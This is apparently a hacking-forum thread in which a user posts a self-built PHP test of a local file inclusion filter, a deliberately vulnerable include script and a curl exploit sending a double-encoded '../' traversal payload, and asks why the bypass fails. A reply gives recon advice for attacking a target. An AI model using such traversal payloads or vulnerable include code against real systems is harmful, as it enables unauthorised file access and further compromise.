Bypass LFI filter with double encoding
#1
Hi guys,

I'm trying to bypass a lfi filter using double encoding:
https://www.owasp.org/index.php/Double_Encoding

I made three files to see whether it would work, but it doesn't, it will remove everything except the file name.

../include.php: the file I want to include
PHP Code:
<?php
echo"hi";
?>

test.php: lfi filter that I try to bypass
PHP Code:
<?php
error_reporting
(E_ALL);
ini_set('display_errors''On');
$_GET['sFile'] = str_replace("../","",strtolower($_GET['sFile']));
$_GET['sFile'] = str_replace("./","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2e%2f","",$_GET['sFile']);
$_GET['sFile'] = str_replace("%2e%2f","",$_GET['sFile']);
include(
$_GET['sFile']);
?>

exploit.php: the script that sends the payload
PHP Code:
<?php
$ch 
curl_init();
/* double encoding of "../" => "%252E%252E%252F" */
curl_setopt($chCURLOPT_URL"http://url/lfitest/tst/test.php?sFile=%252E%252E%252Finclude.php");
curl_setopt($chCURLOPT_RETURNTRANSFER1);
$sOutput curl_exec($ch);
curl_close($ch);
echo 
$sOutput;
?>

Any help would be greatly appreciated.
Thanks in advance!
Reply
#2
(04-03-2017, 07:25 PM)peanutbutter Wrote: -snip-
Questions...
Are you attempting lfi to get some lfi exploits in your exp. Or from not being able to identify more vulns off the target? Lfi point to bigger flaws that are lying around. Possible Shell injections and Remote cmd executions etc... Sqli isn't the easiest to go for imo, as many high end sites have dropped $ on detection of many attacks etc... I only run into blind/time Sqli these days.

Have you done proper recon on your target?
What was your recon approach?
Recon is key to much of exploitation. Minimizes time used in acquiring correct exploitation methods. Scanners are OK but you're better off using burp pro or some good manual techniques AFTER you identified key details on target such as Os, Server, DB etc...
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Is it possible to bypass two factor authentication? QMark 10 4,773 04-21-2019, 09:38 PM
Last Post: MuddyBucket
  Simple Trick to Bypass File Upload Problem abaykan 2 5,170 05-02-2018, 01:33 PM
Last Post: abaykan
  Possible way to bypass Apache Mod_Security? oxid 1 5,651 08-05-2017, 09:27 PM
Last Post: lunorian
  [Video] Basic LFI and uploading PHP Shell Insider 7 8,370 01-04-2017, 07:29 PM
Last Post: Vector